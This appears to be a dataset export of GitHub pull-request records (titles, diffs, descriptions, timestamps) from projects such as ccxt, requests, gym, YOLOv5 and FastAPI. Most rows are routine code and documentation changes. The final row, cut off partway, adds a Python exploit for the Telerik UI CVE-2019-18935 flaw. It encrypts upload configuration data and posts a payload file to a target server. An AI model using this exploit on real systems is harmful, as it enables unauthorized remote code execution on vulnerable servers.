Dataset columns (dtype and length/value range):

| column | dtype | range |
|---|---|---|
| `title` | string | lengths 2 to 169 |
| `diff` | string | lengths 235 to 19.5k |
| `body` | string | lengths 0 to 30.5k |
| `url` | string | lengths 48 to 84 |
| `created_at` | string | lengths 20 to 20 |
| `closed_at` | string | lengths 20 to 20 |
| `merged_at` | string | lengths 20 to 20 |
| `updated_at` | string | lengths 20 to 20 |
| `diff_len` | float64 | values 101 to 3.99k |
| `repo_name` | string (categorical) | 83 distinct values |
| `__index_level_0__` | int64 | values 15 to 52.7k |
coinbasepro: remove deprecated market fields
diff --git a/js/coinbasepro.js b/js/coinbasepro.js index 13e686a2be8f..93ff48a64e38 100644 --- a/js/coinbasepro.js +++ b/js/coinbasepro.js @@ -391,8 +391,8 @@ module.exports = class coinbasepro extends Exchange { 'max': undefined, }, 'amount': { - 'min': this.safeNumber (market, 'base_min_size'), - 'max': this.safeNumber (market, 'base_max_size'), + 'min': undefined, + 'max': undefined, }, 'price': { 'min': undefined, @@ -400,7 +400,7 @@ module.exports = class coinbasepro extends Exchange { }, 'cost': { 'min': this.safeNumber (market, 'min_market_funds'), - 'max': this.safeNumber (market, 'max_market_funds'), + 'max': undefined, }, }, 'info': market,
fixes #14013
https://api.github.com/repos/ccxt/ccxt/pulls/14015
2022-06-22T13:53:43Z
2022-06-22T16:29:59Z
2022-06-22T16:29:58Z
2022-06-22T16:29:59Z
228
ccxt/ccxt
13,848
[tutorial] add video link
diff --git a/examples/tutorial/README.md b/examples/tutorial/README.md index 633e2f5a7c96..9de1cdfdc31d 100644 --- a/examples/tutorial/README.md +++ b/examples/tutorial/README.md @@ -20,13 +20,13 @@ quickly deploy large AI model training and inference, reducing large AI model tr ## Table of Content - - Multi-dimensional Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/hybrid_parallel) - - Sequence Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/sequence_parallel) - - Large Batch Training Optimization [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/large_batch_optimizer) - - Automatic Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/auto_parallel) - - Fine-tuning and Inference for OPT [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/opt) - - Optimized AlphaFold [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/fastfold) - - Optimized Stable Diffusion [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion) + - Multi-dimensional Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/hybrid_parallel) [[video]](https://www.youtube.com/watch?v=OwUQKdA2Icc) + - Sequence Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/sequence_parallel) [[video]](https://www.youtube.com/watch?v=HLLVKb7Cszs) + - Large Batch Training Optimization [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/large_batch_optimizer) [[video]](https://www.youtube.com/watch?v=9Un0ktxJZbI) + - Automatic Parallelism [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/auto_parallel) [[video]](https://www.youtube.com/watch?v=_-2jlyidxqE) + - Fine-tuning and Inference for OPT [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/opt) [[video]](https://www.youtube.com/watch?v=jbEFNVzl67Y) + - Optimized AlphaFold [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/tutorial/fastfold) [[video]](https://www.youtube.com/watch?v=-zP13LfJP7w) + - Optimized Stable Diffusion [[code]](https://github.com/hpcaitech/ColossalAI/tree/main/examples/images/diffusion) [[video]](https://www.youtube.com/watch?v=8KHeUjjc-XQ) ## Discussion @@ -37,7 +37,7 @@ If you think there is a need to discuss anything, you may jump to our [Slack](ht If you encounter any problem while running these tutorials, you may want to raise an [issue](https://github.com/hpcaitech/ColossalAI/issues/new/choose) in this repository. ## 🛠️ Setup environment -You should use `conda` to create a virtual environment, we recommend **python 3.8**, e.g. `conda create -n colossal python=3.8`. This installation commands are for CUDA 11.3, if you have a different version of CUDA, please download PyTorch and Colossal-AI accordingly. +[[video]](https://www.youtube.com/watch?v=dpMYj974ZIc) You should use `conda` to create a virtual environment, we recommend **python 3.8**, e.g. `conda create -n colossal python=3.8`. This installation commands are for CUDA 11.3, if you have a different version of CUDA, please download PyTorch and Colossal-AI accordingly. ``` # install torch
## 📌 Checklist before creating the PR

- [ ] I have created an issue for this PR for traceability
- [ ] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description`
- [ ] I have added relevant tags if possible for us to better distinguish different PRs

## 🚨 Issue number

> Link this PR to your issue with words like fixed to automatically close the linked issue upon merge
>
> e.g. `fixed #1234`, `closed #1234`, `resolved #1234`

## 📝 What does this PR do?

> Summarize your work here.
> If you have any plots/diagrams/screenshots/tables, please attach them here.

## 💥 Checklist before requesting a review

- [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue))
- [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible
- [ ] I have performed a self-review of my code
- [ ] I have added thorough tests.
- [ ] I have added docstrings for all the functions/methods I implemented

## ⭐️ Do you enjoy contributing to Colossal-AI?

- [ ] 🌝 Yes, I do.
- [ ] 🌚 No, I don't. Tell us more if you don't enjoy contributing to Colossal-AI.
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/2619
2023-02-07T07:11:50Z
2023-02-07T07:14:52Z
2023-02-07T07:14:51Z
2023-02-07T07:14:56Z
901
hpcaitech/ColossalAI
11,142
Do not pass over the `session` argument to `Session.request` method
diff --git a/requests/api.py b/requests/api.py index 8ff22e7baa..40966cf350 100644 --- a/requests/api.py +++ b/requests/api.py @@ -34,7 +34,7 @@ def request(method, url, **kwargs): :param verify: (optional) if ``True``, the SSL cert will be verified. A CA_BUNDLE path can also be provided. """ - s = kwargs.get('session') or sessions.session() + s = kwargs.pop('session') if 'session' in kwargs else sessions.session() return s.request(method=method, url=url, **kwargs)
The `request` method of the `Session` class does not take a `session` argument, but `api.request` does. So it has to be popped before the whole `kwargs` dict can be passed on to the `Session.request` method.
https://api.github.com/repos/psf/requests/pulls/344
2012-01-09T05:47:35Z
2012-01-10T19:11:01Z
2012-01-10T19:11:01Z
2021-09-08T13:06:10Z
145
psf/requests
32,300
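The requests PR above is a one-line illustration of a common `**kwargs` forwarding pitfall. Below is a minimal, self-contained sketch of the same pattern with hypothetical stand-ins (not requests' actual internals) showing why the `session` keyword must be popped before forwarding the remaining keywords.

```python
# Hypothetical stand-ins illustrating the fix: Session.request has no
# `session` parameter, so forwarding one via **kwargs would raise TypeError.
class Session:
    def request(self, method, url, timeout=None):
        # Simplified placeholder for the real Session.request signature.
        return (method, url, timeout)

def request(method, url, **kwargs):
    # Pop the caller-supplied session so it is not forwarded to Session.request.
    s = kwargs.pop('session') if 'session' in kwargs else Session()
    return s.request(method=method, url=url, **kwargs)

# Without the pop, Session.request would receive an unexpected `session` kwarg.
print(request('GET', 'https://example.com', session=Session(), timeout=5))
```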
Updating the docstring disable_env_checker
diff --git a/gym/envs/registration.py b/gym/envs/registration.py index 8b7a2ac83b8..5b9c8a4fd30 100644 --- a/gym/envs/registration.py +++ b/gym/envs/registration.py @@ -126,7 +126,7 @@ class EnvSpec: * max_episode_steps: The max number of steps that the environment can take before truncation * order_enforce: If to enforce the order of `reset` before `step` and `render` functions * autoreset: If to automatically reset the environment on episode end - * disable_env_checker: If to disable the environment checker wrapper by default in `gym.make` + * disable_env_checker: If to disable the environment checker wrapper in `gym.make`, by default False (runs the environment checker) * kwargs: Additional keyword arguments passed to the environments through `gym.make` """ @@ -558,8 +558,9 @@ def make( max_episode_steps: Maximum length of an episode (TimeLimit wrapper). autoreset: Whether to automatically reset the environment after each episode (AutoResetWrapper). new_step_api: Whether to use old or new step API (StepAPICompatibility wrapper). Will be removed at v1.0 - disable_env_checker: If to run the env checker, None will default to the environment `spec.disable_env_checker` - (that is by default True), otherwise will run according to the parameter (True = not run, False = run) + disable_env_checker: If to run the env checker, None will default to the environment specification `disable_env_checker` + (which is by default False, running the environment checker), + otherwise will run according to this parameter (`True` = not run, `False` = run) kwargs: Additional arguments to pass to the environment constructor. Returns: diff --git a/gym/vector/__init__.py b/gym/vector/__init__.py index 185082715c8..3dc4998fa8d 100644 --- a/gym/vector/__init__.py +++ b/gym/vector/__init__.py @@ -35,9 +35,10 @@ def make( num_envs: Number of copies of the environment. asynchronous: If `True`, wraps the environments in an :class:`AsyncVectorEnv` (which uses `multiprocessing`_ to run the environments in parallel). If ``False``, wraps the environments in a :class:`SyncVectorEnv`. wrappers: If not ``None``, then apply the wrappers to each internal environment during creation. - disable_env_checker: If to disable the env checker, if True it will only run on the first environment created. + disable_env_checker: If to run the env checker for the first environment only. None will default to the environment spec `disable_env_checker` parameter + (that is by default False), otherwise will run according to this argument (True = not run, False = run) new_step_api: If True, the vector environment's step method outputs two booleans `terminated`, `truncated` instead of one `done`. - **kwargs: Keywords arguments applied during gym.make + **kwargs: Keywords arguments applied during `gym.make` Returns: The vectorized environment. diff --git a/gym/vector/vector_env.py b/gym/vector/vector_env.py index ad2710e02ae..3ca4663d822 100644 --- a/gym/vector/vector_env.py +++ b/gym/vector/vector_env.py @@ -36,7 +36,7 @@ def __init__( num_envs: Number of environments in the vectorized environment. observation_space: Observation space of a single environment. action_space: Action space of a single environment. 
- new_step_api (bool): Whether the vector env's step method outputs two boolean arrays (new API) or one boolean array (old API) + new_step_api (bool): Whether the vector environment's step method outputs two boolean arrays (new API) or one boolean array (old API) """ self.num_envs = num_envs self.is_vector_env = True @@ -54,8 +54,7 @@ def __init__( self.new_step_api = new_step_api if not self.new_step_api: deprecation( - "Initializing vector env in old step API which returns one bool array instead of two. " - "It is recommended to set `new_step_api=True` to use new step API. This will be the default behaviour in future. " + "Initializing vector env in old step API which returns one bool array instead of two. It is recommended to set `new_step_api=True` to use new step API. This will be the default behaviour in future." ) def reset_async( @@ -147,7 +146,7 @@ def step(self, actions): actions: element of :attr:`action_space` Batch of actions. Returns: - Batch of (observations, rewards, terminateds, truncateds, infos) or (observations, rewards, dones, infos) + Batch of (observations, rewards, terminated, truncated, infos) or (observations, rewards, dones, infos) """ self.step_async(actions) return self.step_wait()
Address the comment in https://github.com/openai/gym/commit/519dfd9117e98e4f52d38064d2b0f79974fb676d
https://api.github.com/repos/openai/gym/pulls/2967
2022-07-14T21:59:09Z
2022-07-17T20:50:40Z
2022-07-17T20:50:40Z
2022-07-17T20:50:40Z
1,144
openai/gym
5,457
update det_r50_vd_sast_totaltext.yml
diff --git a/configs/det/det_r50_vd_sast_totaltext.yml b/configs/det/det_r50_vd_sast_totaltext.yml index a92f1b6e53..e040c4207e 100755 --- a/configs/det/det_r50_vd_sast_totaltext.yml +++ b/configs/det/det_r50_vd_sast_totaltext.yml @@ -62,7 +62,7 @@ Train: name: SimpleDataSet data_dir: ./train_data/ label_file_list: [./train_data/art_latin_icdar_14pt/train_no_tt_test/train_label_json.txt, ./train_data/total_text_icdar_14pt/train_label_json.txt] - data_ratio_list: [0.5, 0.5] + ratio_list: [0.5, 0.5] transforms: - DecodeImage: # load image img_mode: BGR
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/1573
2020-12-24T09:18:18Z
2020-12-24T09:21:12Z
2020-12-24T09:21:12Z
2020-12-24T09:21:13Z
211
PaddlePaddle/PaddleOCR
42,550
fix: incorrect prompt type breaking gptme benchmarks
diff --git a/gpt_engineer/benchmark/benchmarks/gptme/load.py b/gpt_engineer/benchmark/benchmarks/gptme/load.py index b845f7dca0..216c7c44db 100644 --- a/gpt_engineer/benchmark/benchmarks/gptme/load.py +++ b/gpt_engineer/benchmark/benchmarks/gptme/load.py @@ -12,6 +12,7 @@ """ from gpt_engineer.benchmark.types import Benchmark, Task from gpt_engineer.core.files_dict import FilesDict +from gpt_engineer.core.prompt import Prompt def load_gptme(): @@ -30,7 +31,7 @@ def load_gptme(): name="hello", initial_code=FilesDict({"hello.py": "print('Hello, world!')"}), command="python hello.py", - prompt="Change the code in hello.py to print 'Hello, human!'", + prompt=Prompt("Change the code in hello.py to print 'Hello, human!'"), assertions={ "correct output": lambda assertable: assertable.stdout == "Hello, human!\n", @@ -44,7 +45,7 @@ def load_gptme(): name="hello-patch", initial_code=FilesDict({"hello.py": "print('Hello, world!')"}), command="python hello.py", - prompt="Patch the code in hello.py to print 'Hello, human!'", + prompt=Prompt("Patch the code in hello.py to print 'Hello, human!'"), assertions={ "correct output": lambda assertable: assertable.stdout == "Hello, human!\n", @@ -58,7 +59,9 @@ def load_gptme(): name="hello-ask", initial_code=FilesDict({"hello.py": "print('Hello, world!')"}), command="echo 'Erik' | python hello.py", - prompt="modify hello.py to ask the user for their name and print 'Hello, <name>!'. don't try to execute it", + prompt=Prompt( + "modify hello.py to ask the user for their name and print 'Hello, <name>!'. don't try to execute it" + ), assertions={ "correct output": lambda assertable: "Hello, Erik!" in assertable.stdout, @@ -70,7 +73,9 @@ def load_gptme(): {} ), # Empty dictionary since no initial code is provided command="python prime.py", - prompt="write a script prime.py that computes and prints the 100th prime number", + prompt=Prompt( + "write a script prime.py that computes and prints the 100th prime number" + ), assertions={ "correct output": lambda assertable: "541" in assertable.stdout.split(), @@ -82,7 +87,9 @@ def load_gptme(): {} ), # Empty dictionary since no initial code is provided command="git status", - prompt="initialize a git repository, write a main.py file, and commit it", + prompt=Prompt( + "initialize a git repository, write a main.py file, and commit it" + ), assertions={ "clean exit": lambda assertable: assertable.process.returncode == 0, "clean working tree": lambda assertable: "nothing to commit, working tree clean"
The gptme benchmarking suite uses plain strings for prompts, which causes an error because `agent#improve` assumes it receives a `Prompt` object.
https://api.github.com/repos/gpt-engineer-org/gpt-engineer/pulls/1096
2024-04-01T11:19:07Z
2024-04-02T23:37:22Z
2024-04-02T23:37:22Z
2024-04-02T23:37:22Z
743
gpt-engineer-org/gpt-engineer
33,166
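The gpt-engineer PR above wraps bare strings in the `Prompt` type that downstream code expects. The following sketch uses hypothetical stand-ins for `Prompt` and `improve` (not gpt-engineer's real classes) to show why a consumer that reads attributes off a typed wrapper breaks when handed a plain string.

```python
# Hypothetical Prompt/improve pair illustrating why bare strings break a
# consumer that expects Prompt objects (not gpt_engineer's actual code).
class Prompt:
    def __init__(self, text: str):
        self.text = text

def improve(prompt: Prompt) -> str:
    # A consumer that reaches into Prompt attributes fails on a plain str.
    return prompt.text.upper()

print(improve(Prompt("Change the code in hello.py to print 'Hello, human!'")))  # works
try:
    improve("Change the code in hello.py to print 'Hello, human!'")  # plain string
except AttributeError as err:
    print(f"plain string fails: {err}")
```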
Fix openai extension script.py - TypeError: '_Environ' object is not …
diff --git a/extensions/openai/script.py b/extensions/openai/script.py index 582479172e..f937338522 100644 --- a/extensions/openai/script.py +++ b/extensions/openai/script.py @@ -8,7 +8,7 @@ from modules.text_generation import encode, generate_reply params = { - 'port': int(os.environ('OPENEDAI_PORT')) if 'OPENEDAI_PORT' in os.environ else 5001, + 'port': int(os.environ.get('OPENEDAI_PORT')) if 'OPENEDAI_PORT' in os.environ else 5001, } debug = True if 'OPENEDAI_DEBUG' in os.environ else False
…callable

Fixes the following issue:

    Traceback (most recent call last):
      File "text-generation-webui/modules/extensions.py", line 33, in load_extensions
        exec(f"import extensions.{name}.script")
      File "<string>", line 1, in <module>
      File "text-generation-webui/extensions/openai/script.py", line 11, in <module>
        'port': int(os.environ('OPENEDAI_PORT')) if 'OPENEDAI_PORT' in os.environ else 5001,
    TypeError: '_Environ' object is not callable
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/1753
2023-05-03T06:06:02Z
2023-05-03T12:51:49Z
2023-05-03T12:51:49Z
2023-05-03T12:51:49Z
148
oobabooga/text-generation-webui
26,777
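The text-generation-webui fix above comes down to `os.environ` being a mapping, not a callable. A small runnable sketch of the broken and fixed forms (the `OPENEDAI_PORT` value is set here purely for demonstration):

```python
import os

os.environ['OPENEDAI_PORT'] = '5002'  # example value for demonstration only

# Broken form from the original script: calling the mapping raises TypeError.
try:
    port = int(os.environ('OPENEDAI_PORT'))
except TypeError as err:
    print(f"os.environ is not callable: {err}")

# Fixed form: treat os.environ as a dict-like mapping.
port = int(os.environ.get('OPENEDAI_PORT')) if 'OPENEDAI_PORT' in os.environ else 5001
print(port)  # 5002
```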
Add trace_as_chain_group metadata
diff --git a/libs/core/langchain_core/callbacks/manager.py b/libs/core/langchain_core/callbacks/manager.py index e216f479832ac6..b1f103871f1318 100644 --- a/libs/core/langchain_core/callbacks/manager.py +++ b/libs/core/langchain_core/callbacks/manager.py @@ -67,6 +67,7 @@ def trace_as_chain_group( example_id: Optional[Union[str, UUID]] = None, run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, + metadata: Optional[Dict[str, Any]] = None, ) -> Generator[CallbackManagerForChainGroup, None, None]: """Get a callback manager for a chain group in a context manager. Useful for grouping different calls together as a single run even if @@ -83,6 +84,8 @@ def trace_as_chain_group( run_id (UUID, optional): The ID of the run. tags (List[str], optional): The inheritable tags to apply to all runs. Defaults to None. + metadata (Dict[str, Any], optional): The metadata to apply to all runs. + Defaults to None. Note: must have LANGCHAIN_TRACING_V2 env var set to true to see the trace in LangSmith. @@ -95,7 +98,7 @@ def trace_as_chain_group( llm_input = "Foo" with trace_as_chain_group("group_name", inputs={"input": llm_input}) as manager: # Use the callback manager for the chain group - res = llm.predict(llm_input, callbacks=manager) + res = llm.invoke(llm_input, {"callbacks": manager}) manager.on_chain_end({"output": res}) """ # noqa: E501 from langchain_core.tracers.context import _get_trace_callbacks @@ -106,6 +109,7 @@ def trace_as_chain_group( cm = CallbackManager.configure( inheritable_callbacks=cb, inheritable_tags=tags, + inheritable_metadata=metadata, ) run_manager = cm.on_chain_start({"name": group_name}, inputs or {}, run_id=run_id) @@ -141,6 +145,7 @@ async def atrace_as_chain_group( example_id: Optional[Union[str, UUID]] = None, run_id: Optional[UUID] = None, tags: Optional[List[str]] = None, + metadata: Optional[Dict[str, Any]] = None, ) -> AsyncGenerator[AsyncCallbackManagerForChainGroup, None]: """Get an async callback manager for a chain group in a context manager. Useful for grouping different async calls together as a single run even if @@ -157,6 +162,8 @@ async def atrace_as_chain_group( run_id (UUID, optional): The ID of the run. tags (List[str], optional): The inheritable tags to apply to all runs. Defaults to None. + metadata (Dict[str, Any], optional): The metadata to apply to all runs. + Defaults to None. Returns: AsyncCallbackManager: The async callback manager for the chain group. @@ -168,7 +175,7 @@ async def atrace_as_chain_group( llm_input = "Foo" async with atrace_as_chain_group("group_name", inputs={"input": llm_input}) as manager: # Use the async callback manager for the chain group - res = await llm.apredict(llm_input, callbacks=manager) + res = await llm.ainvoke(llm_input, {"callbacks": manager}) await manager.on_chain_end({"output": res}) """ # noqa: E501 from langchain_core.tracers.context import _get_trace_callbacks @@ -176,7 +183,9 @@ async def atrace_as_chain_group( cb = _get_trace_callbacks( project_name, example_id, callback_manager=callback_manager ) - cm = AsyncCallbackManager.configure(inheritable_callbacks=cb, inheritable_tags=tags) + cm = AsyncCallbackManager.configure( + inheritable_callbacks=cb, inheritable_tags=tags, inheritable_metadata=metadata + ) run_manager = await cm.on_chain_start( {"name": group_name}, inputs or {}, run_id=run_id
https://api.github.com/repos/langchain-ai/langchain/pulls/17187
2024-02-07T17:22:36Z
2024-02-07T17:42:44Z
2024-02-07T17:42:44Z
2024-02-07T17:42:45Z
936
langchain-ai/langchain
43,509
`export.py` return exported files/dirs
diff --git a/export.py b/export.py index 2e90b0a1b24..a7a79b46b8b 100644 --- a/export.py +++ b/export.py @@ -434,16 +434,17 @@ def run(data=ROOT / 'data/coco128.yaml', # 'dataset.yaml path' LOGGER.info(f"\n{colorstr('PyTorch:')} starting from {file} ({file_size(file):.1f} MB)") # Exports + f = [''] * 10 # exported filenames if 'torchscript' in include: - f = export_torchscript(model, im, file, optimize) + f[0] = export_torchscript(model, im, file, optimize) if 'engine' in include: # TensorRT required before ONNX - f = export_engine(model, im, file, train, half, simplify, workspace, verbose) + f[1] = export_engine(model, im, file, train, half, simplify, workspace, verbose) if ('onnx' in include) or ('openvino' in include): # OpenVINO requires ONNX - f = export_onnx(model, im, file, opset, train, dynamic, simplify) + f[2] = export_onnx(model, im, file, opset, train, dynamic, simplify) if 'openvino' in include: - f = export_openvino(model, im, file) + f[3] = export_openvino(model, im, file) if 'coreml' in include: - _, f = export_coreml(model, im, file) + _, f[4] = export_coreml(model, im, file) # TensorFlow Exports if any(tf_exports): @@ -451,25 +452,27 @@ def run(data=ROOT / 'data/coco128.yaml', # 'dataset.yaml path' if int8 or edgetpu: # TFLite --int8 bug https://github.com/ultralytics/yolov5/issues/5707 check_requirements(('flatbuffers==1.12',)) # required before `import tensorflow` assert not (tflite and tfjs), 'TFLite and TF.js models must be exported separately, please pass only one type.' - model, f = export_saved_model(model, im, file, dynamic, tf_nms=nms or agnostic_nms or tfjs, - agnostic_nms=agnostic_nms or tfjs, topk_per_class=topk_per_class, - topk_all=topk_all, conf_thres=conf_thres, iou_thres=iou_thres) # keras model + model, f[5] = export_saved_model(model, im, file, dynamic, tf_nms=nms or agnostic_nms or tfjs, + agnostic_nms=agnostic_nms or tfjs, topk_per_class=topk_per_class, + topk_all=topk_all, conf_thres=conf_thres, iou_thres=iou_thres) # keras model if pb or tfjs: # pb prerequisite to tfjs - f = export_pb(model, im, file) + f[6] = export_pb(model, im, file) if tflite or edgetpu: - f = export_tflite(model, im, file, int8=int8 or edgetpu, data=data, ncalib=100) + f[7] = export_tflite(model, im, file, int8=int8 or edgetpu, data=data, ncalib=100) if edgetpu: - f = export_edgetpu(model, im, file) + f[8] = export_edgetpu(model, im, file) if tfjs: - f = export_tfjs(model, im, file) + f[9] = export_tfjs(model, im, file) # Finish + f = [str(x) for x in f if x] # filter out '' and None LOGGER.info(f'\nExport complete ({time.time() - t:.2f}s)' f"\nResults saved to {colorstr('bold', file.parent.resolve())}" f"\nVisualize with https://netron.app" - f"\nDetect with `python detect.py --weights {f}`" - f" or `model = torch.hub.load('ultralytics/yolov5', 'custom', '{f}')" - f"\nValidate with `python val.py --weights {f}`") + f"\nDetect with `python detect.py --weights {f[-1]}`" + f" or `model = torch.hub.load('ultralytics/yolov5', 'custom', '{f[-1]}')" + f"\nValidate with `python val.py --weights {f[-1]}`") + return f # return list of exported files/dirs def parse_opt():
@kalenmike updates export.py's `run()` function to return an array of all exported files, i.e.:

```python
python export.py --include torchscript onnx
Out[4]: ['yolov5s.torchscript', 'yolov5s.onnx']
```

## 🛠️ PR Summary

<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)</sub>

### 🌟 Summary

Improved model export file management in Ultralytics YOLOv5.

### 📊 Key Changes

- Introduced an array `f` to store exported filenames for different model formats.
- Assigned export function outputs for TorchScript, TensorRT, ONNX, OpenVINO, CoreML, TensorFlow SavedModel, TensorFlow Lite, Edge TPU, and TensorFlow.js to specific indices in `f`.
- Updated file path management to filter out empty or None values, ensuring only valid paths are processed.
- Changed the detection and validation command outputs to use the last exported model file.

### 🎯 Purpose & Impact

- 🚀 **Purpose**: To streamline the handling of multiple model exports by organizing the exported filenames into a structured array, making the process more robust and maintainable.
- 📈 **Impact**: Users will experience more clarity on the output of exported files and benefit from a simpler way to reference these files for subsequent tasks like detection and validation. It reduces the potential for errors and confusion when working with multiple export formats.
https://api.github.com/repos/ultralytics/yolov5/pulls/6343
2022-01-19T00:50:51Z
2022-01-19T01:18:24Z
2022-01-19T01:18:24Z
2024-01-19T13:27:27Z
1,110
ultralytics/yolov5
25,224
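The YOLOv5 PR above follows a simple "fixed-slot list, then filter" pattern: each exporter writes into a reserved index, and empty slots are dropped at the end. A minimal sketch with dummy exporters standing in for the real `export_*` functions:

```python
# Sketch of the fixed-slot collection pattern used in export.py's run()
# (dummy exporters stand in for YOLOv5's real export_* functions).
def export_torchscript():
    return 'model.torchscript'

def export_onnx():
    return 'model.onnx'

include = {'torchscript', 'onnx'}
f = [''] * 10  # one slot per supported export format
if 'torchscript' in include:
    f[0] = export_torchscript()
if 'onnx' in include:
    f[2] = export_onnx()

f = [str(x) for x in f if x]  # drop empty/None slots, keep export order
print(f)      # ['model.torchscript', 'model.onnx']
print(f[-1])  # last exported file, used in the printed example commands
```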
✏ Fix typo in `docs/en/docs/help-fastapi.md`
diff --git a/docs/en/docs/help-fastapi.md b/docs/en/docs/help-fastapi.md index 394bccab73e2a..8d8d708ed902e 100644 --- a/docs/en/docs/help-fastapi.md +++ b/docs/en/docs/help-fastapi.md @@ -121,7 +121,7 @@ Have in mind that as chats allow more "free conversation", it's easy to ask ques In GitHub issues the template will guide you to write the right question so that you can more easily get a good answer, or even solve the problem yourself even before asking. And in GitHub I can make sure I always answer everything, even if it takes some time. I can't personally do that with the chat systems. 😅 -Conversations in the chat systems are also not as easily searchable as in GitHub, so questions and answers might get lost in the conversation. And only the ones in GitHub issues count to become a [FastAPI Expert](fastapi-people.md#experts){.internal-link target=_blank}, so you will most probably receive more attention in GitHub isssues. +Conversations in the chat systems are also not as easily searchable as in GitHub, so questions and answers might get lost in the conversation. And only the ones in GitHub issues count to become a [FastAPI Expert](fastapi-people.md#experts){.internal-link target=_blank}, so you will most probably receive more attention in GitHub issues. On the other side, there are thousands of users in the chat systems, so there's a high chance you'll find someone to talk to there, almost all the time. 😄
Fixes a typo on line 124: "isssues" should be "issues".
https://api.github.com/repos/tiangolo/fastapi/pulls/3760
2021-08-25T02:49:15Z
2021-10-07T14:22:16Z
2021-10-07T14:22:16Z
2021-10-07T14:22:16Z
345
tiangolo/fastapi
23,274
Add Hebrew Calendar API
diff --git a/README.md b/README.md index a793844dbd..1d79d9d434 100644 --- a/README.md +++ b/README.md @@ -124,6 +124,7 @@ API | Description | Auth | HTTPS | Link | | Church Calendar | Catholic liturgical calendar | No | No | [Go!](http://calapi.inadiutorium.cz/) | | Czech Namedays Calendar | Lookup for a name and returns nameday date | No | No | [Go!](http://svatky.adresa.info/) | | Google Calendar | Display, create and modify Google calendar events | `OAuth` | Yes | [Go!](https://developers.google.com/google-apps/calendar/) | +| Hebrew Calendar | Convert between Gregarian and Hebrew, fetch Shabbat and Holiday times, etc. | No | No | [Go!](https://www.hebcal.com/home/developer-apis) | | Holidays | Historical data regarding holidays | `apiKey` | Yes | [Go!](https://holidayapi.com/) | | LectServe | Protestant liturgical calendar | No | No | [Go!](http://www.lectserve.com) | | Non-Working Days | Database of ICS files for non working days | No | Yes | [Go!](https://github.com/gadael/icsdb) |
Adds hebcal.com API to the list

Thank you for taking the time to work on a Pull Request for this project!

To ensure your PR is dealt with swiftly please check the following:

- [x] Your submissions are formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md).
- [x] Your changes are made in the [README](../README.md) file, not the auto-generated JSON.
- [x] Your additions are ordered alphabetically.
- [x] Your submission has a useful description.
- [x] Each table column should be padded with one space on either side.
- [x] You have searched the repository for any relevant issues or PRs.
https://api.github.com/repos/public-apis/public-apis/pulls/547
2017-11-15T16:24:47Z
2017-11-15T16:30:26Z
2017-11-15T16:30:26Z
2017-11-15T18:36:10Z
291
public-apis/public-apis
35,680
add Telerik CVE-2019-18935
diff --git a/CVE Exploits/Telerik CVE-2019-18935.py b/CVE Exploits/Telerik CVE-2019-18935.py new file mode 100644 index 0000000000..b255351313 --- /dev/null +++ b/CVE Exploits/Telerik CVE-2019-18935.py @@ -0,0 +1,140 @@ +#!/usr/bin/env python3 +# origin : https://github.com/noperator/CVE-2019-18935 +# INSTALL: +# git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935 +# python3 -m venv env +# source env/bin/activate +# pip3 install -r requirements.txt + +# Import encryption routines. +from sys import path +path.insert(1, 'RAU_crypto') +from RAU_crypto import RAUCipher + +from argparse import ArgumentParser +from json import dumps, loads +from os.path import basename, splitext +from pprint import pprint +from requests import post +from requests.packages.urllib3 import disable_warnings +from sys import stderr +from time import time +from urllib3.exceptions import InsecureRequestWarning + +disable_warnings(category=InsecureRequestWarning) + +def send_request(files): + headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0', + 'Connection': 'close', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Upgrade-Insecure-Requests': '1' + } + response = post(url, files=files, verify=False, headers=headers) + try: + result = loads(response.text) + result['metaData'] = loads(RAUCipher.decrypt(result['metaData'])) + pprint(result) + except: + print(response.text) + +def build_raupostdata(object, type): + return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type) + +def upload(): + + # Build rauPostData. + object = { + 'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version), + 'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version), + 'MaxFileSize': 0, + 'TimeToLive': { # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk. + 'Ticks': 1440000000000, + 'Days': 0, + 'Hours': 40, + 'Minutes': 0, + 'Seconds': 0, + 'Milliseconds': 0, + 'TotalDays': 1.6666666666666666, + 'TotalHours': 40, + 'TotalMinutes': 2400, + 'TotalSeconds': 144000, + 'TotalMilliseconds': 144000000 + }, + 'UseApplicationPoolImpersonation': False + } + type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4' + raupostdata = build_raupostdata(object, type) + + with open(filename_local, 'rb') as f: + payload = f.read() + + metadata = { + 'TotalChunks': 1, + 